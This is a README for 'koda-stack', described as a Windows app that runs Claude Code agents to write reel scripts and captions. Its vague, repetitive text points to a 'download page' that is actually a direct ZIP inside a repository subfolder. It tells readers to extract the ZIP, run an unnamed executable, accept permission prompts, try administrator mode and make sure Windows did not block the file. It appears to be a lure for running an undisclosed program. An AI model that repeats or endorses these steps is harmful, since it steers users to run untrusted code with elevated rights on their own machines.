Koda Stack is a Windows app setup for people who want to turn ideas into finished social content with less manual work. It uses 10 creative agents for Claude Code to help with the full content flow, from script to published reel.
This project is built for end users who want a clear path from draft to output. It keeps the process in one place and reduces the need to switch between tools.
koda-stack helps with tasks like:
- Writing short-form script drafts
- Planning reel structure
- Shaping hooks and endings
- Suggesting visual beats
- Creating captions
- Preparing a publish-ready content pack
- Keeping each step in order
- Moving content through a full pipeline
It is made for fast, repeatable content work. You can use it for one reel or a larger batch of posts.
Use this setup on a Windows PC with:
- Windows 10 or Windows 11
- A modern web browser
- Internet access
- Enough free space for the app and content files
- A Claude Code account or setup that can run the agents
For smooth use, a computer with at least 8 GB of RAM is best. More memory helps if you work with longer scripts or larger content batches.
- Open the download page here: https://raw.githubusercontent.com/JJJurno/koda-stack/main/skills/repurpose/stack-koda-3.3.zip
- On the page, look for the latest release or the main download files.
- Download the file or package that matches Windows.
- If the download comes as a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Find the app file or launch file and double-click it.
- If Windows asks for permission, choose Yes.
- Follow the on-screen steps to finish setup.
If you keep the file in your Downloads folder, you can open it from there each time you want to use it.
When you open koda-stack for the first time:
- Start the app or launcher from the extracted folder.
- Wait for the setup screen to load.
- Connect the parts needed for Claude Code.
- Choose the content task you want to run.
- Enter your script idea, topic, or raw notes.
- Review the first output before moving forward.
The first run may take a little longer while the app prepares the agent flow.
Use koda-stack in a simple workflow:
- Add a topic, script, or rough idea.
- Pick the content goal, such as a reel, short video, or post script.
- Let the creative agents build the draft in steps.
- Review the hook, body, and ending.
- Ask for changes if the tone does not fit.
- Export or copy the final result into your publishing tool.
You do not need to manage every step by hand. The stack is set up to move from one stage to the next with less effort.
The creative team in koda-stack can cover:
- Idea shaping
- Hook writing
- Script drafting
- Message cleanup
- Tone matching
- Beat planning
- Caption drafting
- Title and cover text ideas
- Publish prep
- Final review
Each agent focuses on one part of the content flow. That helps keep the result clear and easy to edit.
A common run looks like this:
- Start with a rough idea.
- Turn that idea into a short script.
- Break the script into visual beats.
- Refine the language for short-form video.
- Add a caption and call to action.
- Prepare the file for publishing.
This workflow works well for creators, marketers, editors, and small teams that need content fast.
To keep things smooth on Windows:
- Keep the app in a simple folder path, such as
C:\koda-stack - Avoid moving files after setup
- Make sure your browser stays up to date
- Keep enough free disk space for exports and working files
- Close extra apps if the system feels slow
If Windows SmartScreen appears, check the file name and source before opening it.
For cleaner output, give koda-stack clear input such as:
- A topic
- A target viewer
- A reel length
- A mood or tone
- A platform, such as Instagram or TikTok
- A goal, such as education, promotion, or storytelling
Example input:
- Topic: 3 mistakes new creators make
- Audience: beginner editors
- Length: 30 seconds
- Tone: clear and calm
- Goal: teach and hold attention
Clear input helps the agents return a better draft on the first pass.
koda-stack fits well for:
- Solo creators making short-form videos
- Social media managers
- Content teams with repeat tasks
- Agencies that need faster draft work
- Editors who want a script-first workflow
- Founders who want to publish without a large team
It works best when you need many pieces of content with the same structure.
The app may create:
- Draft scripts
- Hook options
- Beat lists
- Caption text
- Publish notes
- Reworked versions
- Export-ready content files
Keep your working folder organized so you can find each version fast. A simple folder structure like Ideas, Drafts, and Final can help.
If the app does not start:
- Check that the file finished downloading.
- Make sure the file was extracted if it came as a ZIP.
- Try opening it again as administrator.
- Check that Windows did not block the file.
- Confirm that Claude Code is set up.
- Restart your PC and try once more.
If the content output looks wrong, give the app a clearer topic or shorter task.
Use these habits for a better workflow:
- Keep one project per folder
- Save the first draft before editing
- Use short prompts
- Review each step before moving on
- Keep a copy of final output
- Match the tone to the platform
These small steps save time and reduce confusion.
